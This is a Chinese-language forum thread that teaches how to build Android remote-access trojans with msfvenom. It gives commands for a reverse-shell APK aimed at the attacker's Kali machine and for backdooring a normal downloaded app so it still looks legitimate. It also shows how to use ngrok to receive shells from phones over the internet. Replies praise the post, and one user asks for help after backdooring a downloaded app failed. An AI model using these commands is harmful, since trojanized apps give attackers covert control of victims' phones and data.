找回密码
 注册

QQ登录

只需一步,快速开始

一:生成的木马得不到反弹

导致此问题出现最大的原因是网络的问题,手机和kali不在同一网段内。比如手机的ip地址是192.168.1.2kali的ip地址为192.168.1.4也就是说,手机和kali在同一网段192.168.1.1/24
怎么设置:
kali下虚拟机的上网方式默认为NAT模式,我们设置为桥接模式即可!


或者我们的kali连接无线网络,也可以的!


比如该实例中,手机的ip是192.168.0.189 kali的ip是192.168.0.106(记住kali的ip地址,要用!)
生成木马

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=5555 R > kali.apk


这样我们就生成了一个内网版的安卓木马!
参数说明:
LHOST :kali的ip地址(不是手机的)
LPORT :kali的内网端口(可以自定义)
kali.apk : 生成木马的名字

给正常APP添加后门

ps:此方法只适用于没有加壳的app
首先,我们在某平台下载某app
执行下面命令
msfvenom -x sx.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=5555 -o aa.apk

可以看到,和前面的命令相比较,多了一个-x参数。后面跟要添加后门的app名字即可!

当我们运行该APP时,成功得到反弹!


app也正常运行


外网木马
以上教程仅仅适合内网的渗透测试,那么我们看看如何使用外网的连接!
以前说过,如何利用花生壳制作外网shell的教程,今天我们来看看利用ngrok进行的渗透测试!
我们新增一个TCP协议

如果提示端口占用,试试查看可用端口
然后点击开通
然后下载客户端执行./sunny clientid  你的id(具体移步文章 kali制作外网shell)
生成外网木马
生成外网木马,其实很重的一点就是我们要知道外网的ip地址。很简单,我们ping下分配给我们的域名即可。

如图,我们得到了我们的外网ip,端口在开通tcp协议时,我们就得到了。直接生成木马即可。
需要注意的是,我们在配置msf时,填写的参数是我们内网的端口和ip,而不是我们公网的!
切换到4G,成功得到shell



我知道答案 本帖寻求最佳答案回答被采纳后将获得系统奖励10 金币 , 目前已有10人回答

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
分享至 : QQ空间
收藏
有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴

10 个回复

倒序浏览
讲的很详细!谢谢分享!
回复 使用道具 举报 1 0

不错!支持下!
谁有敬业福啊!
回复 使用道具 举报
谢谢分享,学习了
回复 使用道具 举报 2 0
admin 2019-7-18 14:10:35
5#
mjhopen 发表于 2019-7-18 00:50
谢谢分享,学习了

共同学习!!!
回复 使用道具 举报
共同学习!!!
回复 使用道具 举报
admin 2019-8-9 08:42:27
7#
火焰之剑 发表于 2019-8-5 07:08
共同学习!!!

666
回复 使用道具 举报
不错,很好可以学习一下
回复 使用道具 举报
开启payload的命令我都忘了   
回复 使用道具 举报
我用在某平台下载的apk,为什么不加壳加码为什么会报错   制作失败?
回复 使用道具 举报
12下一页
您需要登录后才可以回帖 登录 | 注册